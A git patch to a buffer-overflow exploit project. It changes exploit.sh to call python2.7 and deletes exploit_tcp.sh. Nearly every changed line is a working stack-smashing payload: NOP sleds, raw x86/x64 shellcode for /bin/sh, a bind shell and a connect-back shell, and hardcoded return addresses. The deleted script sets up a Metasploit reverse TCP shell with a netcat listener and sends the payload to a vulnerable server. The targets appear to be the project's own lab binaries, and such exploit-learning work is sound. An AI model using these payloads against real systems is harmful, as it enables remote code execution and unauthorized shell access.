From 05bcdd20a2ba4a28ae7028020fbfbf046e97dae6 Mon Sep 17 00:00:00 2001
From: lns <matzeton@googlemail.com>
Date: Wed, 11 Jul 2018 11:45:33 +0200
Subject: exploit.sh: force python2.7, deleted non-working exploit_tcp.sh (will
 be replaced  in the future anyway)

Signed-off-by: lns <matzeton@googlemail.com>
---
 exploit.sh     | 16 ++++++++--------
 exploit_tcp.sh | 30 ------------------------------
 2 files changed, 8 insertions(+), 38 deletions(-)
 delete mode 100755 exploit_tcp.sh

diff --git a/exploit.sh b/exploit.sh
index 92fad29..643fa50 100755
--- a/exploit.sh
+++ b/exploit.sh
@@ -41,7 +41,7 @@ find_return_adr64() {
 		echo "$0: check adr index: $3"
 		return 1
 	fi
-python - <<EOF
+python2.7 - <<EOF
 import struct, binascii
 print repr(struct.pack('<Q', int('$chs',16)))[1:33]
 EOF
@@ -53,8 +53,8 @@ if [ ! -f "${DIR}/overflow" -o ! -f "${DIR}/overflow_x64" ]; then
 	exit 1
 fi
 
-RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3)
-RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3)
+RETURN_ADR_OVERFLOW32=$(find_return_adr32 "${DIR}/overflow" "$(python2.7 -c 'print "\x90"*117 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*154')" 3)
+RETURN_ADR_OVERFLOW64=$(find_return_adr64 "${DIR}/overflow_x64" "$(python2.7 -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*153 + ""')" 3)
 
 
 if [ -z "$1" ]; then
@@ -67,32 +67,32 @@ if [ "$1" = "local32" ]; then
 	# NOPsled(158) + shellcode(70) + NOPsled(117) + return_addr(4)
 	# uses own shellcode: shellcode/hello.asm (x86-nasm)
 	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW32}"
-	gdb -ex r --args ./overflow $(python -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
+	gdb -ex r --args ./overflow $(python2.7 -c 'print "\x90"*158 + "\x31\xc0\x31\xdb\x31\xc9\x99\xeb\x08\x5b\x88\x43\x07\xb0\x0b\xcd\x80\xe8\xf3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68" + "\x90"*117 +"'${RETURN_ADR_OVERFLOW32}'"')
 
 elif [ "$1" = "local64" ]; then
 
 	# NOPsled(133) + shellcode(34) + NOPsled(145) + return_addr(8)
 	# uses own shellcode: shellcode/execve_x64.o
 	echo "$0: using return adr: ${RETURN_ADR_OVERFLOW64}"
-	gdb -ex r --args ./overflow_x64 $(python -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
+	gdb -ex r --args ./overflow_x64 $(python2.7 -c 'print "\x90"*133 + "\xeb\x13\x48\x31\xc0\x5f\x88\x47\x07\x57\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\xe8\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff" + "\x90"*145 + "'${RETURN_ADR_OVERFLOW64}'"')
 
 elif [ "$1" = "bind32" ]; then
 
 	# 85xNOP + shellcode(134) + 85xNOP + return addr
 	# uses own shellcode: shellcode/socket.asm (x86-nasm)
-	./overflow `python -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
+	./overflow `python2.7 -c 'print "\x90"*85 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\x31\xdb\xb3\x02\xb0\x66\xcd\x80\x31\xc0\x50\x52\x89\xe1\xb0\x66\x31\xdb\xb3\x04\xcd\x80\x31\xc0\x50\x66\x50\x66\x6a\x02\x89\xe1\x6a\x10\x54\x51\x52\x89\xe1\x31\xdb\xb3\x05\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xc3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" + "\x90"*85 + "\xc4\xf2\xff\xbf"'`
 
 elif [ "$1" = "bind64" ]; then
 
 	# 100xNOP + shellcode(149) + 63xNOP + return addr
 	# uses own shellcode: shellcode/socket_x64.asm (x64-nasm)
-	./overflow_x64 `python -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05"  + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`
+	./overflow_x64 `python2.7 -c 'print "\x90"*100 + "\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x40\xb7\x02\x40\xb6\x01\xb0\x29\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\xb2\x10\xb0\x31\x0f\x05\x48\x31\xc0\x48\x31\xf6\xb0\x32\x0f\x05\x48\x31\xc0\x50\x66\x68\xaa\x11\x66\x6a\x02\x48\x89\xe6\x6a\x10\x48\x89\xe2\xb0\x2b\x0f\x05\x48\x89\xc7\x48\x31\xd2\xb2\x03\x48\x89\xd6\x48\xff\xce\x48\x31\xc0\xb0\x21\x0f\x05\xfe\xca\x75\xef\x48\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x50\x48\x31\xc0\x88\x44\x24\x08\x48\x89\xe7\x50\x48\x89\xe6\x50\x48\x89\xe2\xb0\x3b\x0f\x05\x48\x31\xc0\x48\x31\xff\x40\xb7\x42\xb0\x3c\x0f\x05"  + "\x90"*63 + "\x02\xe7\xff\xff\xff\x7f"'`
 
 elif [ "$1" = "connect32" ]; then
 
 	# 97 bytes NOP + 110 bytes shellcode + 97 bytes NOP + return addr
 	# uses own shellcode: shellcode/connect.asm (x86-nasm)
-	./overflow `python -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
+	./overflow `python2.7 -c 'print "\x90"*97 + "\x31\xc0\x31\xdb\x50\xb3\x01\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80\x89\xc2\x31\xc0\x68\x6e\x11\x11\x10\x81\x34\x24\x11\x11\x11\x11\x66\x68\x14\x28\x66\x81\x34\x24\x11\x11\x66\x6a\x02\x89\xe1\x6a\x10\x51\x52\x89\xe1\xb3\x03\xb0\x66\xcd\x80\x31\xc9\xb1\x03\x89\xd3\x31\xc0\xb0\x3f\xfe\xc9\xcd\x80\xfe\xc1\xe2\xf4\x31\xc0\x31\xc9\x99\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x88\x44\x24\x08\xb0\x0b\xcd\x80\xb0\x01\x31\xdb\xb3\x42\xcd\x80" +"\x90"*97 + "\xc4\xf2\xff\xbf"'`
 
 else
 	$0
diff --git a/exploit_tcp.sh b/exploit_tcp.sh
deleted file mode 100755
index aecfe2c..0000000
--- a/exploit_tcp.sh
+++ /dev/null
@@ -1,30 +0,0 @@
-#!/bin/sh
-
-# shellcode generated with metasploit (reverse tcp shell; use netcat as tcp server):
-#   ./msfpayload linux/x86/shell_reverse_tcp PrependFork=true AppendExit=true LHOST=127.0.0.1 VERBOSE=true R | ./msfencode -b '\x00\x09\x0a\x0d\x1b\x20'
-
-# 260 --> 260 - 102 = 158 / 2 = 79
-# 79xNOP (0x90) + shellcode + 79xNOP (0x90) + return addr
-
-echo "starting netcat reverse tcp server .."
-screen -c /dev/null -d -m -S overcat /bin/netcat -l -s 127.0.0.1 -p 4444
-sleep 1
-echo "starting exploitable tcp server .."
-./overflow_tcp &
-sleep 1
-
-host="127.0.0.1"
-echo "connecting to $host .."
-python -c 'print "\x90"*79 + \
-"\xba\x91\x60\x15\x91\xdb\xd6\xd9\x74\x24\xf4\x5f\x2b\xc9" + \
-"\xb1\x13\x31\x57\x15\x83\xc7\x04\x03\x57\x11\xe2\x64\x51" + \
-"\xce\x66\x65\xc1\xb3\xdb\x03\xe4\xba\x3d\x63\x8e\x71\x3d" + \
-"\x10\x16\x3a\x01\xdb\x29\x73\x07\x1a\x41\xfb\xf7\xdc\x93" + \
-"\x6b\xfa\xdc\x82\x37\x73\x3d\x14\xa1\xd3\xec\x06\x9d\xd7" + \
-"\x87\x48\x2c\x57\xc5\xe2\x80\x77\x9a\x9a\xb6\xa8\x3e\x32" + \
-"\x29\x3e\x5d\x96\xe6\xc9\x40\xa7\x02\x07\x02\xf9\xcf\xfd" + \
-"\x03\xa2\x22\x81" + \
-"\x90"*83 + "\x9d\xd4\xff\xff"' | nc -q 0 "$host" 3000
-read -p "[PRESS RETURN TO CONTINUE]"
-
-screen -R overcat
-- 
cgit v1.2.3